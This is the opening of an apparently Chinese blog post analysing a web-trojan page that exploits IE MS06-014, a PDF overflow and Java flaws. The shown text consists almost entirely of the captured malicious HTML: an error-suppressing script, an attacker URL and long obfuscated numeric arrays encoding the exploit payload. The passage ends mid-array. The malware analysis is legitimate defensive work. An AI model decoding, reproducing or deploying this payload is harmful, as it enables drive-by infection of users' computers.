一个关于利用 IE MS06-014、PDF 溢出和 2 个 Java 漏洞的网马的解密分析

今日,小博在加密解密区发了一个要求解密贴,http://forum.daokers.com/read.php?tid=2395,点名要我帮忙解密。

于是看了下这个网马。

他的代码如下

<!-- Malzilla Project v.1 --><!-- DAT: 2010-5-14 6:23:53 --><!-- URL: golooglecom.in/rz141_at/index.php?s=208feca1a8b149965fa6d3be651c5953 --><!-- REF: http://fracala.com/bu1/ --><!-- UAS: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) --><!-- CCK:  -->
<html><script type="text/JavaScript">function myErrHandler(){return true;}window.onerror = myErrHandler;</script><body><div id="i8WbG">194</div><script>var XO5g7gw=[102,48,39,52,102,37,2,23,17,9,41,126,119,118,118,55,123,100,33,55,46,52,102,21,102,102,119,48,14,41,102,63,30,123,102,50,39,40,97,44,54,124,37,105,126,19,3,119,34,102,43,41,47,53,105,46,50,22,25,39,37,96,54,34,123,43,42,35,114,21,105,105,42,41,37,50,47,39,32,46,123,97,50,52,42,41,60,42,41,33,125,32,51,41,12,30,5,102,46,54,121,54,39,119,104,104,10,43,127,40,14,35,119,11,40,21,16,106,36,8,62,34,48,42,123,39,37,50,110,60,11,55,117,51,37,50,1,11,111,61,63,40,19,18,46,55,48,55,50,40,14,1,16,1,44,102,118,4,21,116,34,39,37,4,118,21,51,42,14,1,35,39,42,35,119,42,52,18,50,52,21,10,36,61,123,60,16,1,116,19,39,36,16,11,50,50,110,47,37,40,44,125,37,61,50,46,37,46,5,52,11,55,59,118,9,43,1,11,59,14,39,50,1,111,11,111,55,48,111,37,110,104,44,35,42,16,43,118,1,16,61,37,50,34,4,44,40,35,8,50,21,16,104,21,42,110,11,36,32,37,103,37,4,44,35,14,19,50,34,5,40,50,52,63,1,9,1,1,52,11,36,44,50,50,35,39,61,1,55,116,48,55,50,35,11,123,60,119,37,4,59,37,18,50,46,8,10,61,118,4,111,110,39,59,106,26,100,59,50,118,40,39,1,63,61,37,1,37,37,1,103,26,100,111,44,42,119,11,110,40,14,1,37,11,47,46,110,35,5,43,16,1,111,61,9,36,50,52,1,18,44,32,14,11,110,19,110,60,35,55,123,50,11,42,50,35,36,52,16,39,47,32,37,37,37,106,39,50,106,26,100,16,104,50,21,55,50,111,40,44,35,21,48,59,59,116,10,50,34]; var 
XmhnFwsJ7JLb5rn=[48,63,114,50,46,40,12,54,20,50,115,33,57,123,6,120,115,59,33,6,120,6,120,57,24,18,29,39,29,18,29,29,23,56,32,29,23,103,29,48,54,106,52,106,9,12,116,46,63,9,43,12,23,57,55,29,24,46,21,59,14,35,114,20,44,23,50,107,33,46,50,39,57,43,57,56,48,63,115,59,46,6,120,46,39,6,120,118,22,107,40,46,33,46,23,115,33,57,62,106,29,114,39,104,15,23,43,12,23,57,24,29,54,114,123,57,24,12,63,115,33,106,52,29,23,12,116,9,14,18,29,35,29,48,29,51,60,50,48,56,63,29,32,46,21,103,52,18,20,22,46,48,54,62,59,114,9,56,6,120,44,57,46,55,59,46,57,43,63,24,39,57,29,54,118,46,46,104,57,24,114,114,51,60,35,63,57,33,48,29,15,123,6,120,115,115,33,39,32,115,52,46,40,12,9,18,29,106,39,57,50,29,23,103,57,57,23,18,29,50,20,44,43,46,63,9,29,12,116,12,115,107,33,48,54,57,14,23,43,46,104,48,46,56,23,63,40,29,114,106,52,62,59,115,59,52,114,22,52,56,48,63,114,46,55,46,21,39,60,47,39,57,24,51,54,50,23,63,46,29,57,15,46,98,0,106,111,106,97,59,45,33,39,39,40,13,9,104,52,43,2,28,45,115,29,47,29,57,109,12,105,42,110,52,122,17,14,6,120,24,18,53,9,107,55,40,114,46,9,55,35,31,63,13,34,62,15,18,53,63,33,43,116,40,62,115,111,31,9,103,104,109,9,13,59,46,42,31,106,63,63,97,109,63,44,56,25,12,63,59,40,55,21,116,48,51,24,41,6,120,47,53,122,50,55,61,116,28,51,111,110,40,46,103,59,105,17,21,46,41,46,51,52,46,63,114,105,9,57]; var 
FIovKVqj92UWt=[124,72,79,77,119,108,23,75,108,70,73,2,92,94,92,99,29,90,93,85,90,80,19,99,29,78,79,90,79,91,6,90,99,29,19,77,11,117,82,90,99,29,20,108,83,94,79,74,15,103,71,31,99,29,99,29,22,4,108,82,83,72,76,122,13,8,10,99,29,86,12,83,17,124,79,87,99,29,126,99,29,12,92,20,99,29,20,99,29,83,69,20,99,29,75,99,29,20,99,29,20,99,29,7,99,29,4,73,94,77,121,81,79,99,29,86,99,29,20,71,31,99,29,20,99,29,117,74,6,90,80,117,99,29,99,29,94,22,73,103,12,13,6,19,117,11,124,2,79,12,119,74,71,107,7,9,109,94,22,112,82,99,29,124,91,71,78,10,108,108,82,78,104,112,124,77,31,121,112,80,122,99,29,126,23,94,13,8,125,82,90,13,15,4,119,78,17,108,75,77,123,121,123,72,122,108,2,112,90,90,77,81,83,125,2,12,105,125,104,83,103,70,116,91,15,83,91,111,104,75,77,4,74,87,17,8,94,75,87,23,86,17,82,124,13,120,125,90,87,82,8,77,125,104,90,105,90,74,86,94,80,83,12,122,83,116,91,92,124,74,90,71,7,107,19,104,91,119,70,90,77,121,108,79,117,78,68,121,71,117,4,17,82,77,6,78,2,23,78,22,114,80,104,13,13,15,9,90,108,22,121,69,4,12,121,125,112,72,124,2,23,74,13,108,77,70,91,109,6,75,124,103,86,8,99,29,112,71,103,80,19,119,7,99,29,114,112,20,12,90,99,29,20,99,29,89,117,122,79,11,20,20,124,91,20,99,29,107,99,29,99,29,77,13,115,10,12,108,82,99,29,99,29,80,99,29,119,17,20,99,29,99,29,81,124,114,15,99,29,103,92,9,90,112,19,107,111,76,80]; var 
GhS8S67Prhrd4n=[86,111,77,98,15,117,83,31,28,97,104,83,123,5,23,66,104,112,9,72,87,15,31,31,127,119,68,70,85,96,123,5,123,5,14,11,17,84,66,94,92,94,104,98,115,66,111,116,123,5,12,123,5,116,95,83,65,97,104,67,30,90,28,14,92,70,79,114,22,23,116,12,112,86,21,80,87,68,79,82,66,16,75,14,20,123,5,111,9,72,26,100,20,123,5,127,123,5,104,123,5,19,18,66,23,104,14,100,127,117,21,127,15,106,109,74,100,115,123,5,115,123,5,123,5,12,104,104,98,123,5,12,66,107,21,17,107,11,117,106,116,12,123,5,72,87,106,123,5,28,97,123,5,22,77,68,123,5,119,123,5,115,21,28,66,73,86,98,119,31,14,127,90,92,15,31,94,79,112,9,11,12,97,104,31,111,15,66,14,83,123,5,23,96,98,26,17,114,85,70,75,84,66,68,79,83,104,70,11,116,65,107,23,116,116,16,100,94,21,117,92,86,20,104,111,116,95,12,123,5,85,127,98,72,123,5,123,5,106,123,5,82,100,80,21,23,112,85,127,123,5,81,66,18,66,123,5,127,15,20,87,67,30,66,12,12,12,123,5,66,19,106,123,5,21,123,5,109,12,123,5,115,123,5,11,123,5,123,5,12,115,106,74,66,123,5,117,107,111,28,23,9,116,21,14,100,104,104,31,17,97,115,123,5,66,116,66,123,5,104,98,72,87,11,73,79,94,112,11,98,119,83,68,15,83,96,119,65,70,79,15,31,77,22,117,111,9,66,14,92,31,75,114,127,86,17,83,87,117,83,23,107,111,68,70,104,117,85,84,28,90,112,66,104,66,66,86,82,66,104,94,100,104,28,106,92,97,84,83,15,31,66,73,15,123,5,73,66,80,7,21,97,112,14,98,123,5,72,14]; var 
pC97R8mG=[22,62,9,11,120,115,1,36,127,63,6,96,45,47,38,27,26,61,98,29,38,1,124,126,13,30,32,110,117,51,26,60,34,98,118,55,4,13,40,117,43,58,59,60,43,103,126,102,22,47,43,103,124,118,53,120,51,51,59,51,54,61,51,32,96,8,58,45,52,119,118,117,28,4,43,115,96,26,120,43,13,102,1,117,43,13,127,43,60,54,8,1,34,32,126,25,60,43,8,1,43,1,61,26,42,44,55,62,124,124,25,34,4,33,54,4,1,118,103,126,61,124,32,59,117,52,119,96,118,59,43,32,33,28,117,52,1,62,115,8,25,44,103,60,119,54,13,124,12,96,42,55,102,103,124,26,39,34,43,117,118,96,1,62,4,118,59,8,52,58,8,54,60,4,103,102,13,59,43,102,43,26,33,119,54,54,54,4,29,38,60,42,39,40,4,56,96,29,47,6,98,13,26,117,63,8,12,35,55,11,6,43,34,60,42,60,22,63,58,124,32,110,43,34,43,58,62,11,29,103,127,33,61,55,11,29,32,117,45,59,102,63,102,103,35,12,39,40,63,47,54,96,45,1,110,110,35,32,59,60,59,22,47,45,117,43,8,42,42,115,57,43,47,60,13,45,56,47,32,39,30,58,119,63,120,47,123,29,51,61,54,125,53,56,124,20,15,60,32,3,15,125,105,123,124,115,52,1,121,43,60,110,8,13,126,117,120,110,127,12,56,10,55,102,60,119,124,5,119,118,125,15,120,123,99,127,63,119,11,125,13,105,126,127,126,99,10,13,120,123,98,105,118,122,8,13,125,99,126,126,99,99,123,15,15,99,127,120,12,10,119,125,105,98,123,126,99,126,126,120,127,120,119,11,99,122,99,11,13,119,12,13,122,11,10,126,98,105,124,121,121,99,124,125,125,126,105,15,122]; var 
DRBSwL67q34RN=[16,21,100,101,101,16,100,102,96,96,113,19,18,97,123,20,23,18,103,102,102,102,102,19,96,102,102,102,21,123,18,102,102,111,111,102,102,113,102,103,102,123,102,102,102,123,102,103,103,102,123,102,102,96,21,102,123,102,101,102,102,113,123,102,16,123,122,23,102,102,102,102,102,102,102,102,102,102,113,21,102,102,102,102,102,102,102,102,102,98,96,96,113,122,98,101,123,102,102,123,53,103,48,50,123,102,97,96,96,102,99,96,102,102,102,53,97,102,55,55,111,18,50,123,51,97,110,113,111,50,100,100,48,53,102,123,98,99,103,51,96,123,110,113,122,98,51,101,101,97,101,18,110,21,123,98,103,98,111,21,96,103,123,97,16,123,110,23,16,99,20,20,100,20,123,103,16,123,16,23,18,102,123,18,101,19,16,113,110,123,100,98,101,122,113,102,96,123,101,101,113,97,16,21,102,16,122,96,123,23,101,101,101,21,101,96,19,101,101,111,19,16,18,111,123,101,103,113,102,122,113,111,98,110,102,100,102,19,110,99,98,103,100,101,123,110,123,123,103,98,16,96,100,98,123,123,110,96,97,97,97,21,18,110,103,96,110,96,113,18,123,20,53,111,16,23,102,103,97,98,110,20,100,18,101,111,16,99,102,97,96,113,98,20,122,103,102,123,111,101,98,99,23,113,16,123,110,99,96,123,98,111,102,20,99,98,21,110,98,98,113,103,20,98,101,100,97,100,123,110,101,21,18,123,48,111,16,20,101,97,18,123,103,111,103,110,102,122,113,18,102,102,123,98,99,21,96,113,123,96,111,16,122,103,123,103,123,98,23,110,21,123,96,23,20,21,16,123,98,111,96,21,96,16,20,16,18,23,102,52,19,21,21,58,23,35,58,97,21,100,99,113,103,100,127,20,113,20,21]; var 
ase4R143=[103,98,107,100,58,40,101,106,22,98,36,51,37,8,60,59,96,35,126,60,25,55,62,102,49,101,111,96,39,34,107,15,123,41,105,37,1,35,102,33,122,36,102,103,32,62,55,42,37,34,9,59,2,31,29,60,97,103,23,96,101,114,96,98,62,98,23,54,101,29,63,61,111,54,39,1,61,105,20,32,55,51,97,105,55,61,97,1,63,63,38,55,23,62,49,60,38,124,55,14,112,97,61,38,56,55,49,38,122,123,61,55,1,23,96,59,48,14,112,49,48,49,63,103,55,60,101,33,14,112,49,102,63,39,38,14,112,54,124,98,37,34,14,112,38,29,42,19,54,25,14,112,38,32,59,15,49,33,55,38,1,8,60,126,107,35,9,59,62,51,62,33,121,101,33,17,2,23,96,29,103,105,96,101,1,35,55,40,122,36,104,122,51,63,114,33,59,102,32,43,96,31,20,36,97,54,41,37,7,111,25,29,34,97,61,123,34,42,59,52,123,52,122,37,98,100,14,112,54,98,55,41,38,55,1,22,102,107,1,24,10,97,39,17,35,32,34,42,32,61,126,14,112,63,103,23,96,101,14,112,121,14,112,38,14,112,1,26,14,112,98,97,1,22,121,58,62,121,55,14,112,121,14,112,52,14,112,122,14,112,59,14,112,121,7,105,14,112,62,124,61,1,49,51,123,41,59,52,34,14,112,99,25,62,59,19,34,8,122,42,60,37,106,23,96,29,32,100,98,14,112,59,121,51,6,5,38,34,37,7,63,61,1,25,102,55,34,123,52,122,49,60,59,99,1,103,32,60,51,38,103,58,123,123,101,39,59,47,55,2,114,55,97,1,31,98,29,96,121,55,105,63,35,107,51,61,32,47,123,41,47,47,38,96,33,55,47,49,8,20,63,54,122,6,33,114,105,123,47]; var 
kN2Z9ejg8CW=[98,60,59,32,32,101,107,56,76,50,115,127,126,48,121,113,100,48,56,115,101,126,90,61,102,34,45,107,122,100,98,48,101,117,57,100,43,76,50,119,113,122,48,79,116,100,56,57,113,124,48,105,43,48,118,76,76,126,96,127,76,76,90,76,50,103,61,61,127,119,124,113,102,127,115,127,125,42,114,76,76,124,121,48,120,121,126,76,76,76,76,76,76,76,76,106,33,113,62,98,125,124,117,115,127,117,76,76,63,98,125,63,73,54,79,33,99,113,63,127,119,62,100,100,124,127,102,116,120,126,62,113,62,104,36,73,45,63,47,127,127,119,118,120,100,127,96,124,121,99,116,127,117,62,118,48,33,96,100,121,103,48,126,113,45,96,56,103,93,121,127,118,121,96,96,94,115,98,98,62,102,100,119,76,50,117,48,127,117,113,126,43,121,98,113,113,107,98,105,48,100,48,76,50,100,96,100,125,45,45,117,125,48,126,107,102,113,98,124,99,48,85,48,48,89,126,117,126,48,127,85,124,117,125,98,117,98,76,50,104,116,127,115,57,56,100,45,57,117,127,90,101,127,117,126,85,83,68,113,76,50,115,121,62,48,121,76,50,95,82,76,50,100,98,100,62,115,61,45,48,85,43,99,124,113,99,82,83,32,85,83,85,86,81,42,83,84,86,115,32,116,48,85,84,81,127,83,39,32,32,61,116,32,109,101,32,124,99,32,32,43,82,113,61,86,86,61,85,48,127,84,115,126,57,43,101,83,117,57,81,81,76,50,90,115,120,56,125,117,95,48,62,124,45,117,115,48,48,115,116,100,115,85,126,100,56,76,50,113,98,56,117,126,120,113,100,115,124,113,101,83,68,43,127,62,127,98,117,34,100,107,102,121,116,34,99,125,82,124,121,124,99,117,85,113,62,36,48,40]; var 
C59CT49=[58,73,59,107,34,83,45,38,83,45,74,34,62,63,55,50,47,54,76,108,59,124,47,78,75,34,63,63,108,62,75,122,34,63,114,60,83,45,53,55,62,59,77,60,74,108,61,33,63,103,54,54,75,54,106,54,114,47,99,124,52,125,47,96,110,97,74,99,38,98,106,110,47,97,96,33,106,69,39,106,99,110,74,96,116,121,106,97,121,110,47,107,77,108,122,122,106,52,83,45,64,98,76,91,39,123,106,123,98,38,52,108,125,47,50,50,38,33,106,97,47,64,123,106,74,97,47,107,83,45,123,106,99,47,108,77,33,122,83,45,91,125,47,52,96,118,127,125,96,32,97,127,110,108,106,97,123,39,102,99,106,83,45,110,110,123,96,123,122,125,98,74,76,47,106,97,50,83,45,98,106,34,124,123,96,122,97,69,34,127,99,106,104,123,100,123,102,127,127,97,33,102,97,118,110,109,99,96,96,127,96,108,102,99,123,123,118,99,98,52,107,106,50,110,123,102,106,106,125,102,127,47,127,127,99,118,98,83,45,97,47,52,101,127,102,97,123,123,109,96,96,98,99,96,122,96,102,108,121,110,123,83,45,110,127,106,97,38,99,52,110,123,33,97,32,106,107,127,83,45,34,107,118,33,107,76,106,34,108,122,96,110,100,102,39,96,123,127,97,123,97,118,123,109,107,102,33,52,107,108,106,97,110,127,96,107,107,96,33,106,97,38,114,47,76,107,103,123,99,107,52,103,125,118,98,103,102,99,103,47,38,97,38,116,39,122,99,110,122,97,47,47,127,106,122,99,116,106,108,39,123,108,96,33,110,114,47,116,114,38,52,114,39,114,33,52,108,110,106,108,103,39,97,124,63,123,47,108,47,83,45,96,39,114,122,104,38,98,47,35,62,63,63,110,123,108,103,91,122]; var 
Lc38a4J3mH2mYd=[87,11,3,73,24,70,69,86,66,64,127,1,73,66,85,87,74,70,10,3,3,81,85,3,77,3,3,11,10,24,87,66,124,71,74,3,66,70,3,76,124,85,80,102,30,77,71,3,79,65,11,73,66,10,13,66,81,10,88,70,78,85,79,76,64,70,78,87,70,87,11,64,66,86,66,70,77,79,66,83,83,70,77,87,78,77,87,70,70,83,66,87,70,127,1,127,1,81,24,30,127,1,85,87,81,3,79,70,78,70,13,3,81,24,78,66,78,66,66,70,79,70,83,66,81,66,78,70,10,127,1,71,3,79,70,81,74,65,66,78,13,78,70,77,87,11,127,1,70,76,64,86,87,98,87,86,80,70,127,1,70,78,15,87,66,83,102,81,64,70,85,66,81,11,127,1,24,83,70,78,13,80,3,87,77,87,3,127,1,18,79,66,64,127,1,10,86,66,78,70,127,1,87,70,65,127,1,11,64,19,80,78,98,79,87,81,74,87,26,19,70,18,86,70,64,15,66,65,70,18,21,21,26,65,26,19,66,69,70,66,23,69,19,16,70,17,16,66,69,64,22,26,16,23,19,18,70,26,19,69,69,65,66,21,20,21,66,65,27,65,23,26,66,21,19,71,70,27,69,69,70,21,69,21,27,19,26,21,66,69,64,20,66,70,66,21,17,21,66,22,69,21,70,27,70,21,17,71,27,21,64,17,71,21,17,65,66,21,64,16,71,19,66,66,26,27,66,19,65,66,17,71,17,21,17,21,23,16,19,71,71,71,26,71,64,70,70,19,17,21,71,19,26,21,17,19,70,19,70,69,71,66,71,16,22,22,66,21,26,27,17,16,22,18,64,22,66,21,66,23,70,64,22,21,69,71,64,21,17,23,66,21,66,16,22,27,23,71,71,16,66,21,22,26,69,27,71,23,71]; var 
tTk37HLK=[125,43,46,124,122,121,47,42,122,124,38,124,122,124,39,124,123,126,121,124,122,38,122,38,45,126,122,38,42,43,122,125,126,43,41,124,41,126,41,126,123,45,126,43,122,126,41,122,44,42,122,123,42,43,40,122,41,45,47,126,41,124,43,124,44,124,126,45,38,42,38,121,41,124,122,126,41,124,42,125,45,124,41,121,39,122,123,126,42,43,42,40,126,124,124,126,44,39,47,124,40,41,46,126,45,45,42,126,126,121,44,126,45,123,122,124,47,124,45,126,126,45,45,121,41,41,46,122,41,42,41,121,46,40,42,41,41,38,41,45,123,121,38,121,122,121,41,121,42,121,123,126,44,121,40,121,47,121,41,42,39,121,41,121,47,123,122,126,47,38,126,126,123,42,38,121,47,121,41,121,126,123,45,38,42,42,44,39,41,121,47,123,38,125,42,121,41,41,121,126,42,39,44,41,121,42,42,45,44,126,42,45,41,46,123,43,39,122,41,123,47,47,123,123,45,41,42,122,41,40,47,123,123,125,40,40,123,126,38,40,125,126,42,45,40,122,122,125,38,38,124,38,124,41,46,126,125,43,40,121,39,42,42,38,123,124,125,126,126,45,123,126,42,45,44,40,125,121,39,121,121,41,123,121,47,40,123,126,39,39,123,121,39,42,39,122,44,41,42,125,126,126,123,122,124,45,45,126,42,39,40,42,38,123,122,47,122,45,123,45,39,42,123,126,45,39,122,123,38,121,123,46,39,38,47,38,42,41,38,43,38,38,124,124,45,40,124,124,123,126,39,43,126,123,41,124,41,124,38,124,38,45,43,123,42,121,38,125,124,39,38,123,126,124,45,124,126,43,123,125,42,124,44,39,39,43,40,124,125,124,40,38,39,123,46,123,124,124,40,124,40,124,38,124,46,39,39,38,45]; var 
L58iTmje915Cs=[104,104,105,104,53,103,53,102,53,104,50,48,50,52,53,99,104,50,55,104,50,100,50,48,105,101,50,55,53,104,50,104,105,97,50,97,105,105,50,97,50,102,50,99,37,52,48,51,50,101,104,51,50,103,55,104,106,100,53,103,37,52,16,103,104,56,51,36,53,16,50,96,13,115,59,48,39,48,52,37,13,115,53,52,33,52,48,102,61,52,13,115,125,113,120,61,52,34,61,50,59,50,62,106,13,115,121,37,60,127,34,52,48,39,35,33,35,5,13,115,120,48,35,125,13,115,37,52,53,36,37,16,121,37,52,113,37,96,48,39,56,127,51,35,13,115,57,127,52,52,13,115,51,39,60,127,34,52,60,52,48,56,106,59,50,52,37,13,115,13,115,120,116,36,37,16,48,13,115,125,59,61,52,37,37,35,56,37,60,54,48,38,56,59,121,53,113,121,37,97,97,52,13,115,13,115,35,52,56,97,97,57,13,115,39,37,127,34,120,106,59,61,125,113,13,115,96,52,48,16,37,120,57,13,115,96,52,63,116,48,52,57,33,48,36,37,52,51,37,33,56,106,121,33,48,13,115,52,35,53,61,127,61,52,60,52,18,52,60,61,53,39,127,39,37,57,56,48,48,127,48,120,106,59,62,62,53,40,53,63,51,53,60,50,36,60,52,56,61,53,121,63,33,33,52,48,52,120,106,44,113,18,120,113,57,56,48,97,97,52,120,106,13,115,52,54,59,48,14,56,37,113,52,61,62,62,14,56,106,113,113,36,121,13,115,37,30,39,5,34,60,63,50,35,63,39,48,125,98,34,51,97,55,121,60,36,37,37,62,40,113,120,42,63,53,53,113,33,35,37,33,55,48,61,37,13,115,37,55,113,48,37,52,121,52,20,60,52,51,42,30,51,59,120,108,59,50,36,60]; var 
MoDbuKo7Zc73A7y=[126,79,73,101,104,79,94,105,79,118,8,79,78,73,88,79,68,94,2,79,73,90,107,94,17,17,6,76,4,118,8,78,118,8,118,8,67,78,4,4,89,96,111,94,94,88,67,90,94,79,2,95,73,72,10,94,64,3,10,78,76,94,78,70,95,27,79,78,118,8,6,105,76,88,67,72,2,118,8,75,89,29,18,94,7,79,107,26,18,89,101,72,64,108,31,7,118,8,107,19,7,30,89,67,67,78,73,79,94,70,3,17,4,27,107,110,25,31,118,8,73,30,89,26,7,16,24,67,70,90,69,107,18,83,4,68,94,27,105,30,26,26,118,8,75,64,76,79,24,26,31,95,68,72,78,110,30,30,78,2,105,66,94,78,26,90,17,92,75,88,72,78,73,88,71,79,90,78,10,92,69,4,79,73,89,2,92,2,94,101,79,79,10,64,78,76,79,79,88,10,70,10,94,17,27,3,69,68,10,23,92,124,79,88,113,67,17,92,3,6,89,88,109,67,10,27,23,90,88,4,89,90,118,8,3,10,4,118,8,23,118,8,79,10,2,29,2,10,17,67,76,89,92,79,88,70,23,118,8,3,22,10,113,118,8,92,79,3,10,17,92,79,88,20,67,94,2,118,8,29,4,10,119,118,8,88,10,79,88,2,27,10,23,10,23,79,10,86,30,119,12,4,2,79,92,10,88,2,92,88,79,118,8,3,10,86,12,12,3,10,10,2,118,8,88,92,20,12,10,2,92,118,8,3,10,18,23,27,12,86,3,4,29,118,8,10,118,8,10,4,86,10,10,3,88,10,18,118,8,27,25,20,10,19,118,8,22,90,92,79,2,92,73,22,118,8,12,4,10,3,23,10,2,75,95,71,79,23,70,78,69,88,10,81,94,118,8,10,10,2,79,111,70,88,68,94,4,73,10]; var 
axrg9i4sOv=[55,122,120,55,62,104,123,108,123,127,123,66,60,55,108,123,123,112,106,115,123,55,123,39,106,114,115,106,112,123,122,120,115,48,109,123,106,106,54,127,125,106,113,66,60,123,123,37,110,123,66,60,119,120,66,60,95,114,113,109,108,119,36,106,115,106,112,108,119,124,121,49,49,121,113,106,62,42,118,123,107,54,66,60,49,108,110,37,114,123,65,127,114,123,125,123,110,47,50,118,115,48,120,106,55,112,120,48,106,49,123,54,119,106,110,118,115,106,95,122,110,47,100,113,123,37,106,108,62,44,120,123,35,66,60,110,106,112,33,110,122,106,109,66,60,106,95,122,106,108,107,124,55,118,46,122,48,109,123,66,60,113,119,123,106,123,54,66,60,105,115,123,121,46,119,50,106,48,124,125,112,123,37,112,120,122,114,123,66,60,118,110,118,123,115,123,113,48,124,107,106,106,110,50,106,122,115,123,112,118,127,122,112,119,62,123,114,122,120,123,103,44,46,46,55,62,109,99,125,107,122,54,110,114,101,74,54,55,119,48,99,106,55,99,106,66,60,119,127,123,65,119,123,46,125,93,106,62,37,99,123,106,62,62,62,50,39,46,62,37,62,118,54,123,62,62,113,107,66,60,110,62,62,122,120,55,62,55,62,115,54,62,62,62,62,62,62,62,62,62,37,62,62,62,62,46,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,60,37,62,104,127,108,62,118,77,107,123,40,71,84,43,45,35,125,90,79,73,81,113,38,47,46,46,111,48,109,110,114,119,106,54,60,60,55,37,62,104,127,108,62,68,46,74,77,113,100,35,43,40,43]; var 
Yw8hi55BB61NPYB=[7,8,19,69,82,65,19,95,90,90,11,116,112,2,74,4,11,3,75,14,10,8,19,69,82,65,19,117,0,5,1,121,73,107,126,114,93,5,14,93,86,68,19,114,65,65,82,74,27,7,31,10,31,11,31,4,31,2,31,6,31,10,31,7,31,2,26,8,19,69,82,65,19,92,97,120,71,112,122,121,71,100,3,11,1,31,107,123,4,114,100,107,91,96,5,31,87,1,7,6,106,64,31,92,7,5,105,92,6,64,101,74,122,81,5,119,31,71,100,68,11,6,69,7,4,6,119,126,93,31,67,2,73,93,1,106,0,0,65,90,125,2,94,31,113,3,6,120,3,5,6,8,85,92,65,19,27,107,123,4,114,100,107,91,96,5,14,3,8,19,107,123,4,114,100,107,91,96,5,15,95,90,90,11,116,112,2,74,4,11,3,75,8,19,107,123,4,114,100,107,91,96,5,24,24,26,19,19,72,19,19,19,19,19,19,69,82,65,19,81,11,5,82,125,74,14,117,0,5,1,121,73,107,126,114,93,5,104,107,123,4,114,100,107,91,96,5,110,25,1,8,19,19,19,19,69,82,65,19,127,3,7,11,99,10,74,14,105,3,103,96,92,73,22,81,11,5,82,125,74,8,19,19,19,19,69,82,65,19,86,66,7,121,67,11,87,14,105,3,103,96,92,73,30,127,3,7,11,99,10,74,8,19,19,19,19,69,82,65,19,87,89,88,101,2,7,114,114,14,86,66,7,121,67,11,87,28,81,11,5,82,125,74,8,19,19,19,19,69,82,65,19,85,107,66,95,82,69,14,87,89,88,101,2,7,114,114,25,117,0,5,1,121,73,107,126,114,93,5,104,107,123,4,114,100,107,91,96,5,110,8,19,19,19,19,92,7,5,105,92,6,64,101,74,122,81,5,119,14]; var 
K210J6y5ntw=[99,104,115,115,115,115,53,60,33,115,123,60,1,24,39,16,26,25,39,4,99,107,97,110,99,104,115,60,1,24,39,16,26,25,39,4,99,107,97,111,55,57,56,5,98,103,18,18,104,115,60,1,24,39,16,26,25,39,4,99,107,97,120,120,122,115,115,115,115,115,40,115,115,115,115,115,115,115,115,53,60,33,115,123,55,97,103,102,10,32,110,99,104,115,55,97,103,102,10,32,111,21,96,101,97,25,41,11,30,18,61,101,8,11,27,100,18,4,11,59,0,101,14,104,115,55,97,103,102,10,32,120,120,122,115,115,115,115,115,115,115,115,115,40,115,115,115,115,115,115,39,4,36,107,102,37,103,100,102,23,30,61,110,60,103,101,9,60,102,32,5,42,26,49,101,23,120,55,97,103,102,10,32,104,115,115,115,115,115,115,115,115,115,115,115,115,17,99,102,24,99,101,102,110,59,0,38,54,101,10,25,102,96,8,39,4,36,107,102,37,103,100,102,23,30,61,14,104,115,115,115,115,115,115,115,115,115,115,115,115,35,98,41,61,97,10,96,96,33,58,29,98,62,110,39,4,36,107,102,37,103,100,102,23,30,61,120,21,96,101,97,25,41,11,30,18,61,101,8,11,27,100,18,4,11,59,0,101,14,104,115,115,115,115,115,115,115,115,115,115,115,115,59,0,38,54,101,10,25,102,96,8,39,4,36,107,102,37,103,100,102,23,30,61,14,110,59,0,38,54,101,10,25,102,96,8,35,98,41,61,97,10,96,96,33,58,29,98,62,14,104,115,115,115,115,115,115,115,115,115,115,115,115,59,0,38,54,101,10,25,102,96,8,35,98,41,61,97,10,96,96,33,58,29,98,62,14,110,17,99,102,24,99,101,102,104,115,115,115,115,115,115,115,115,115,115,46,115,115]; var 
gR0F30B=[125,125,125,125,125,125,50,105,107,7,50,104,46,11,36,20,63,107,25,125,118,96,63,101,107,60,19,36,102,125,125,125,125,125,125,125,125,125,32,125,125,32,125,125,62,25,12,10,18,50,101,108,109,109,44,96,53,14,40,56,107,4,23,104,110,115,55,50,52,51,117,127,127,116,102,43,60,47,125,59,51,47,12,108,5,25,110,104,63,96,109,102,43,60,47,125,36,56,109,104,4,106,54,40,26,125,96,125,51,60,43,52,58,60,41,50,47,115,40,46,56,47,28,58,56,51,41,115,41,50,17,50,42,56,47,30,60,46,56,117,116,102,52,46,20,24,125,96,125,117,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,48,46,52,56,122,116,125,124,96,125,112,108,125,123,123,125,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,50,45,56,47,60,122,116,125,96,96,125,112,108,116,102,52,46,18,45,56,47,60,125,96,125,117,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,50,45,56,47,60,122,116,125,124,96,125,112,108,116,102,52,46,26,56,62,54,50,125,96,125,117,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,58,56,62,54,50,122,116,125,124,96,125,112,108,125,123,123,125,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,46,60,59,60,47,52,122,116,125,96,96,125,112,108,116,102,52,46,14,60,59,60,47,52,125,96,125,117,36,56,109,104,4,106,54,40,26,115,52,51,57,56,37,18,59,117,122,46,60,59,60,47,52,122,116,125,124,96,125,112,108,125,123,123,125,36,56,109,104,4,106,54,40,26,115,52,51,57,56]; var 
a6oXU27F8V=[96,87,126,48,63,123,112,106,119,117,125,63,49,56,37,37,56,53,41,49,35,113,107,83,119,118,105,109,125,106,119,106,56,37,56,48,97,125,40,45,65,47,115,109,95,54,113,118,124,125,96,87,126,48,63,115,119,118,105,109,125,106,119,106,63,49,56,57,37,56,53,41,49,35,113,107,91,112,106,119,117,125,56,37,56,48,97,125,40,45,65,47,115,109,95,54,113,118,124,125,96,87,126,48,63,123,112,106,119,117,125,63,49,56,57,37,56,53,41,49,35,113,126,48,113,107,81,93,57,37,126,121,116,107,125,49,99,113,126,56,48,48,66,90,91,110,90,32,83,33,97,108,42,113,37,118,121,110,113,127,121,108,119,106,54,107,97,107,108,125,117,84,121,118,127,109,121,127,125,49,62,62,48,75,66,42,40,112,66,80,66,90,124,64,37,118,121,110,113,127,121,108,119,106,54,109,107,125,106,84,121,118,127,109,121,127,125,49,62,62,48,98,40,87,44,9